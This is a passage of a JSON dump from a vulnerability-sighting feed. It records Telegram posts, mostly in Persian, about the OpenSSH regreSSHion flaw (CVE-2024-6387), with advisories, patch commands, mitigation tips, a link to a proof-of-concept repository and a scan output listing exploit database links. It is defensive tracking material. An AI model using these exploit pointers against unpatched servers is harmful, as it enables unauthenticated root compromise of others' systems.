\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f.\n\n\u2796\u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\n\u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc OpenSSH \u0627\u0632 8.5p1 \u062a\u0627 9.8p1 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u0646\u062f.\n\n\u2796 \u062a\u0623\u062b\u06cc\u0631\n\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633\u06cc \u06a9\u0647 \u0627\u0632 glibc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u062c\u0627\u0632\u0647 \u062f\u0647\u062f \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06a9\u0627\u0631\u0628\u0631 root \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f.\n\n\u2796\u0631\u0627\u0647\u200c\u062d\u0644\u200c\n \u0628\u0647 \u0646\u0633\u062e\u0647 9.8p1 \u06cc\u0627 \u0628\u0627\u0644\u0627\u062a\u0631 OpenSSH \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u06a9\u0646\u06cc\u062f.\n\u0627\u06af\u0631 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0641\u0648\u0631\u06cc \u0645\u0645\u06a9\u0646 \u0646\u06cc\u0633\u062a\u060c \u062a\u0646\u0638\u06cc\u0645 LoginGraceTime \u0628\u0647 0 \u062f\u0631 \u0641\u0627\u06cc\u0644 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a sshd \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0627 \u062d\u062f\u0648\u062f\u06cc \u0627\u06cc\u0646 \u0645\u0634\u06a9\u0644 \u0631\u0627 \u06a9\u0627\u0647\u0634 \u062f\u0647\u062f\u060c \u0647\u0631\u0686\u0646\u062f \u0627\u06cc\u0646 \u0631\u0627\u0647\u200c\u062d\u0644 \u06a9\u0627\u0645\u0644 \u0646\u06cc\u0633\u062a \u0648 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u0645\u0646\u0639 \u0633\u0631\u0648\u06cc\u0633 \u0645\u0646\u062c\u0631 \u0634\u0648\u062f. \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631\n\n\u2709\ufe0f @PingChannel\n\u062e\u0628\u0631\u060c \u062a\u062d\u0644\u06cc\u0644\u060c \u0627\u0646\u062a\u0642\u0627\u062f - \u0641\u0646\u0627\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a", "creation_timestamp": "2024-07-05T23:21:22.000000Z"}, {"uuid": "ec5dc530-d6f8-4d48-bac5-b5c785d48178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/ANONYMOUSDARK_official/34", "content": "#\u0627\u062e\u0628\u0627\u0631 #\u062e\u0628\u0631\n\ud83d\udd34 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f OpenSSH \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 RCE \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 root \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0634\u0648\u062f\n\n\u2757\ufe0f \u06cc\u06a9 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 OpenSSH \u06a9\u0634\u0641 \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u0631\u06cc\u0634\u0647 \u0631\u0627 \u0628\u062f\u0648\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f.\n\n\ud83d\udccc \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u06a9\u062f regreSSHion \u0628\u0647 \u0634\u0646\u0627\u0633\u0647\u00a0 CVE-2024-6387 \u0627\u062e\u062a\u0635\u0627\u0635 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u062f\u0631 \u0645\u0648\u0644\u0641\u0647 \u0633\u0631\u0648\u0631 OpenSSH\u060c \u0647\u0645\u0686\u0646\u06cc\u0646 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 sshd \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc \u0634\u0648\u062f\u060c \u06a9\u0647 \u0628\u0631\u0627\u06cc \u06af\u0648\u0634 \u062f\u0627\u062f\u0646 \u0628\u0647 \u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0627\u0632 \u0647\u0631 \u06cc\u06a9 \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u06cc \u06a9\u0644\u0627\u06cc\u0646\u062a \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a.\n\n\ud83d\udccc \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u06a9\u0647 \u06cc\u06a9 race condition \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644\u200c\u06a9\u0646\u0646\u062f\u0647 \u0633\u06cc\u06af\u0646\u0627\u0644 \u062f\u0631 \u0633\u0631\u0648\u0631 OpenSSH (sshd) \u0627\u0633\u062a\u060c \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0628\u062f\u0648\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 root \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 glibc \u0645\u06cc\u200c\u062f\u0647\u062f.\n\n\n\u26a0\ufe0f \u0647\u0645\u06cc\u0646 \u0627\u0644\u0627\u0646 \u06a9\u0644\u06cc \u0633\u0631\u0648\u0631 \u062f\u0631 \u0627\u06cc\u0631\u0627\u0646 \u0628\u0647 \u0627\u062d\u062a\u0645\u0627\u0644 \u0632\u06cc\u0627\u062f \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0647 \u0627\u06cc\u0646 \u062d\u0641\u0631\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0647\u0633\u062a\u0646 \u067e\u0633 \u0644\u0637\u0641\u0627 \u067e\u0686 \u06a9\u0646\u06cc\u062f (\u0628\u0627\u0644\u0627\u06cc \u06f2\u06f0\u06f0 \u0647\u0632\u0627\u0631 \u0633\u0631\u0648\u0631)\n\n\ud83d\udee1 \u0627\u06a9\u06cc\u062f\u0627\u064b \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc \u06a9\u0646\u06cc\u0645 \u0628\u0631\u0627\u06cc \u0645\u062d\u0627\u0641\u0638\u062a \u0627\u0632 \u0633\u0631\u0648\u0631 \u062e\u0648\u062f\u060c \u0633\u0631\u0648\u06cc\u0633 \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0628\u0647 \u0631\u0648\u0632 \u06a9\u0646\u06cc\u062f:\n\napt update && apt install --only-upgrade openssh-client openssh-server openssh-sftp-server -y\n\n\u0628\u0631\u0627\u06cc \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc RHEL :\nsudo yum update && sudo yum install openssh-server openssh-clients openssh-sftp-server -y\n\n\ud83d\udcce POC: https://github.com/zgzhang/cve-2024-6387-poc\n\ud83d\udcce analysis: https://pentest-tools.com/blog/regresshion-cve-2024-6387", "creation_timestamp": "2024-08-25T23:54:52.000000Z"}, {"uuid": "bb1ed2c3-b8fe-4df9-9965-f23822994a9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/6961", "content": "PoC Exploit Released for Critical OpenSSH Vulnerability (CVE-2024-6387) \u2013 gbhackers.com\n\nMon, 06 Jan 2025 20:30:02", "creation_timestamp": "2025-01-06T17:03:33.000000Z"}, {"uuid": "5659e7c4-f9c5-40bf-808d-c975a84189a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/b6pKlmEh0eyWZ5AYd7ttU5Flg3Z21dZyIBem0VaMofe2JA", "content": "", "creation_timestamp": "2024-10-09T08:39:30.000000Z"}, {"uuid": "d72be038-d619-43de-8e9d-13f55d15295f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/10576", "content": "9.8     https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC        *EXPLOIT*              |       5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A   9.8     https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A        *EXPLOIT*              |       33D623F7-98E0-5F75-80FA-81AA666D1340   9.8     https://vulners.com/githubexploit/33D623F7-98E0-5F75-80FA-81AA666D1340        *EXPLOIT*              |       0221525F-07F5-5790-912D-F4B9E2D1B587   9.8     https://vulners.com/githubexploit/0221525F-07F5-5790-912D-F4B9E2D1B587        *EXPLOIT*              |       95499236-C9FE-56A6-9D7D-E943A24B633A   8.9     https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A        *EXPLOIT*              |       PACKETSTORM:179290      8.1   https://vulners.com/packetstorm/PACKETSTORM:179290      *EXPLOIT*              |       FB2E9ED1-43D7-585C-A197-0D6628B20134   8.1     https://vulners.com/githubexploit/FB2E9ED1-43D7-585C-A197-0D6628B20134        *EXPLOIT*              |       FA3992CE-9C4C-5350-8134-177126E0BD3F   8.1     https://vulners.com/githubexploit/FA3992CE-9C4C-5350-8134-177126E0BD3F        *EXPLOIT*              |       F8981437-1287-5B69-93F1-657DFB1DCE59   8.1     https://vulners.com/githubexploit/F8981437-1287-5B69-93F1-657DFB1DCE59        *EXPLOIT*              |       F58A5CB2-2174-586F-9CA9-4C47F8F38B5E   8.1     https://vulners.com/githubexploit/F58A5CB2-2174-586F-9CA9-4C47F8F38B5E        *EXPLOIT*              |       EFD615F0-8F17-5471-AA83-0F491FD497AF   8.1     https://vulners.com/githubexploit/EFD615F0-8F17-5471-AA83-0F491FD497AF        *EXPLOIT*              |       EC20B9C2-6857-5848-848A-A9F430D13EEB   8.1     https://vulners.com/githubexploit/EC20B9C2-6857-5848-848A-A9F430D13EEB        *EXPLOIT*              |       EB13CBD6-BC93-5F14-A210-AC0B5A1D8572   8.1     https://vulners.com/githubexploit/EB13CBD6-BC93-5F14-A210-AC0B5A1D8572        *EXPLOIT*              |       E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD   8.1     https://vulners.com/githubexploit/E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD        *EXPLOIT*              |       E543E274-C20A-582A-8F8E-F8E3F381C345   8.1     https://vulners.com/githubexploit/E543E274-C20A-582A-8F8E-F8E3F381C345        *EXPLOIT*              |       E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257   8.1     https://vulners.com/githubexploit/E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257        *EXPLOIT*              |       E24EEC0A-40F7-5BBC-9E4D-7B13522FF915   8.1     https://vulners.com/githubexploit/E24EEC0A-40F7-5BBC-9E4D-7B13522FF915        *EXPLOIT*              |       DC798E98-BA77-5F86-9C16-0CF8CD540EBB   8.1     https://vulners.com/githubexploit/DC798E98-BA77-5F86-9C16-0CF8CD540EBB        *EXPLOIT*              |       DC473885-F54C-5F76-BAFD-0175E4A90C1D   8.1     https://vulners.com/githubexploit/DC473885-F54C-5F76-BAFD-0175E4A90C1D        *EXPLOIT*              |       D85F08E9-DB96-55E9-8DD2-22F01980F360   8.1     https://vulners.com/githubexploit/D85F08E9-DB96-55E9-8DD2-22F01980F360        *EXPLOIT*              |       D572250A-BE94-501D-90C4-14A6C9C0AC47   8.1     https://vulners.com/githubexploit/D572250A-BE94-501D-90C4-14A6C9C0AC47        *EXPLOIT*              |       D1E049F1-393E-552D-80D1-675022B26911   8.1     https://vulners.com/githubexploit/D1E049F1-393E-552D-80D1-675022B26911        *EXPLOIT*              |       CVE-2024-6387   8.1     https://vulners.com/cve/CVE-2024-6387         |       CFEBF7AF-651A-5302-80B8-F8146D5B33A6   8.1     https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6        *EXPLOIT*              |       CF80DDA9-42E7-5E06-8DA8-84C72658E191   8.1     https://vulners.com/githubexploit/CF80DDA9-42E7-5E06-8DA8-84C72658E191        *EXPLOIT*              |       CB2926E1-2355-5C82-A42A-D4F72F114F9B   8.1     https://vulners.com/githubexploit/CB2926E1-2355-5C82-A42A-D4F72F114F9B        *EXPLOIT*              |       C6FB6D50-F71D-5870-B671-D6A09A95627F   8.1     https://vulners.com/githubexploit/C6FB6D50-F71D-5870-B671-D6A09A95627F        *EXPLOIT*              |       C623D558-C162-5D17-88A5-4799A2BEC001", "creation_timestamp": "2025-04-01T08:49:50.000000Z"}, {"uuid": "04b9921f-01a7-46cb-8af4-96dcb79c4840", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/VqfWh7rHpMCbTwTmKsOFHeKJmX2q4zk1VlZFd9tptLMmZg", "content": "", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "d6b021a0-22f9-4c21-812f-85ff58c9f30e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/rBGzVQeWeKtA4eU8X83WO5y61SgPErW2WH6SY3bJXfvPdJ5E", "content": "", "creation_timestamp": "2025-01-12T22:43:36.000000Z"}, {"uuid": "f6ea2a86-a894-46cb-890e-7fc3f0f84718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/ViralCyber/9909", "content": "\ud83d\udd34\u0627\u0646\u062a\u0634\u0627\u0631 Exploit  \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u062d\u0631\u0627\u0646\u06cc  OpenSSH \u0644\u06cc\u0646\u0648\u06a9\u0633\n\ud83d\udd34\u0627\u0645\u0631\u0648\u0632  \u06cc\u06a9 PoC Exploit \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc CVE-2024-6387 \u062f\u0631 OpenSSH \u0628\u0647 \u0635\u0648\u0631\u062a \u0639\u0645\u0648\u0645\u06cc \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0646\u0627\u0634\u0646\u0627\u0633 \u0648 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u062e\u0648\u062f \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0646\u062f.\n\u062c\u0632\u0626\u06cc\u0627\u062a \u06a9\u0644\u06cc\u062f\u06cc:\n\ud83d\udfe1 \u0645\u0646\u0634\u0623 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc: \u06cc\u06a9 \u0648\u0636\u0639\u06cc\u062a \u0631\u0642\u0627\u0628\u062a\u06cc (Race Condition) \u062f\u0631 \u0647\u0646\u062f\u0644\u0631 \u0633\u06cc\u06af\u0646\u0627\u0644 SIGALRM \u062f\u0631 \u062f\u06cc\u0645\u0646 sshd \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 OpenSSH.\n\ud83d\udfe1 \u062a\u0623\u062b\u06cc\u0631: \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0628\u0647 \u0633\u0637\u062d \u0631\u0648\u062a (Root Access) \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0634\u0648\u062f.\n\ud83d\udfe1 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631: \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633\u06cc \u06f3\u06f2 \u0628\u06cc\u062a\u06cc \u06a9\u0647 OpenSSH (\u0648\u0627\u0628\u0633\u062a\u0647 \u0628\u0647 glibc) \u0631\u0627 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f. \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc OpenBSD \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u0646\u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f.\n\n\u25c0\ufe0f\u0646\u06a9\u0627\u062a \u0641\u0646\u06cc:\n\u06cc\u06a9 \u0645\u062d\u06cc\u0637 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 Docker \u0628\u0631\u0627\u06cc \u0622\u0632\u0645\u0627\u06cc\u0634 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0627\u0631\u0627\u0626\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u067e\u0698\u0648\u0647\u0634\u06af\u0631\u0627\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u0628\u0647\u062a\u0631 \u0628\u0647 \u067e\u062a\u0627\u0646\u0633\u06cc\u0644 \u0627\u06cc\u0646 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u067e\u06cc \u0628\u0628\u0631\u0646\u062f. \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a PoC Exploit \u0646\u06cc\u0632 \u0627\u0633\u06a9\u0646\u200c\u0647\u0627\u06cc \u0647\u062f\u0641\u0645\u0646\u062f \u0648 \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0631\u0627 \u062a\u0633\u0647\u06cc\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f.\n\n\u25c0\ufe0f\u062a\u0648\u0635\u06cc\u0647\u200c\u0647\u0627\u06cc \u06a9\u0627\u0647\u0634 \u0631\u06cc\u0633\u06a9:\n\u26a1\ufe0f \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc OpenSSH: \u0622\u062e\u0631\u06cc\u0646 \u0648\u0635\u0644\u0647\u200c\u0647\u0627 \u0631\u0627 \u0641\u0648\u0631\u0627\u064b \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u06cc\u062f.\n\u26a1\ufe0f \u062a\u0642\u0648\u06cc\u062a \u062a\u0646\u0638\u06cc\u0645\u0627\u062a: \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062a\u0639\u062f\u0627\u062f \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0648 \u0646\u0638\u0627\u0631\u062a \u0628\u06cc\u0634\u062a\u0631 \u0628\u0631 \u0644\u0627\u06af\u0647\u0627 \u062f\u0631 SIEM.\n\u26a1\ufe0f \u0646\u0638\u0627\u0631\u062a \u0628\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627: \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u062e\u0648\u062f \u0631\u0627 \u0628\u0647 \u0637\u0648\u0631 \u0645\u0646\u0638\u0645 \u0627\u0632 \u0646\u0638\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u062f.\n\n\u0647\u0634\u062f\u0627\u0631! \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0627\u0632 OpenSSH \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u0628\u0627\u06cc\u062f \u0628\u0647 \u0633\u0631\u0639\u062a \u0628\u0631\u0627\u06cc \u0627\u0645\u0646 \u06a9\u0631\u062f\u0646 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062a\u0647\u062f\u06cc\u062f\u0627\u062a \u0627\u062d\u062a\u0645\u0627\u0644\u06cc \u0627\u0642\u062f\u0627\u0645 \u06a9\u0646\u0646\u062f.\n\u0627\u06cc\u0646 POC Exploit \u0628\u0635\u0648\u0631\u062a \u0639\u0645\u0648\u0645\u06cc \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a.\n\n\ud83d\uddff\ud83d\uddff\ud83e\udd8b\ud83d\uddff\u062a\u0648\u0635\u06cc\u0647 \u0645\u0647\u0645: \u0627\u06af\u0631 \u0627\u0632 \u0645\u062d\u0635\u0648\u0644 \u0628\u0648\u0645\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u0627\u0632 OpenSSH \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a \u0627\u0632 \u062a\u0648\u0644\u06cc\u062f \u06a9\u0646\u0646\u062f\u0647 \u0628\u062e\u0648\u0627\u0647\u06cc\u062f \u0627\u06cc\u0646 \u0645\u0627\u0698\u0648\u0644 \u0631\u0627 Patch \u06a9\u0646\u062f.\n\n\n\u2709\ufe0f @PingChannel\n\u062e\u0628\u0631\u060c \u062a\u062d\u0644\u06cc\u0644\u060c \u0627\u0646\u062a\u0642\u0627\u062f - \u0641\u0646\u0627\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a\n\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\u00a0 \ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b", "creation_timestamp": "2025-01-07T20:04:24.000000Z"}, {"uuid": "197cc068-06e7-435b-8c44-fc3a23fd8368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/nusantaraMYID/1995", "content": "PoC Exploit Released for Critical OpenSSH Vulnerability (CVE-2024-6387) \u2013 gbhackers.com\n\nMon, 06 Jan 2025 20:30:02", "creation_timestamp": "2025-01-06T17:03:30.000000Z"}, {"uuid": "8c605b60-845f-4912-bb07-d097c4407396", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/HackingInsights/4510", "content": "\u200aCVE-2024-6387 aka regreSSHion \u2013 root cause, risks, mitigation\n\nhttps://www.kaspersky.com/blog/openssh-vulnerability-mitigation-cve-2024-6387-regresshion/51603/", "creation_timestamp": "2024-07-02T18:30:30.000000Z"}, {"uuid": "0a4e677f-8a10-4282-9d17-52cc62507c77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/HackingInsights/5852", "content": "\u200aCloud Software Group Confirms CVE-2024-6387 Exposure in NetScaler\n\nhttps://securityonline.info/cloud-software-group-confirms-cve-2024-6387-exposure-in-netscaler/", "creation_timestamp": "2024-07-12T13:28:26.000000Z"}, {"uuid": "91a1848b-73a9-447e-81a1-6d80eb02bdb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/4985", "content": "\u200aPseudo-exploit for CVE-2024-6387 aka regreSSHion | Kaspersky official blog\n\nhttps://www.kaspersky.com/blog/cve-2024-6387-regresshion-researcher-attack/51646/", "creation_timestamp": "2024-07-06T09:56:17.000000Z"}, {"uuid": "e0d2b33e-da99-4daf-b0c2-304c27de6cd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/4415", "content": "\u200aCVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw \u2018regreSSHion\u2019 Exposes Millions of Linux Systems\n\nhttps://securityonline.info/cve-2024-6387-critical-openssh-unauthenticated-rce-flaw-regresshion-exposes-millions-of-linux-systems/", "creation_timestamp": "2024-07-02T11:12:32.000000Z"}, {"uuid": "92a14992-4384-4fbc-a7f6-ce8974f1be90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/5318", "content": "\u200aRegreSSHion (CVE-2024\u20136387): Dive into the Latest OpenSSH Server Threat\n\nhttps://infosecwriteups.com/regresshion-cve-2024-6387-dive-into-the-latest-openssh-server-threat-ba4a6e0983e4?source=rss----7b722bfd1b8d---4", "creation_timestamp": "2024-07-09T10:08:50.000000Z"}, {"uuid": "a5d4f66e-88b9-4e0d-9180-ec7926240172", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/5274", "content": "\u200aCisco Confirms Critical OpenSSH regreSSHion (CVE-2024-6387) Flaw in Multiple 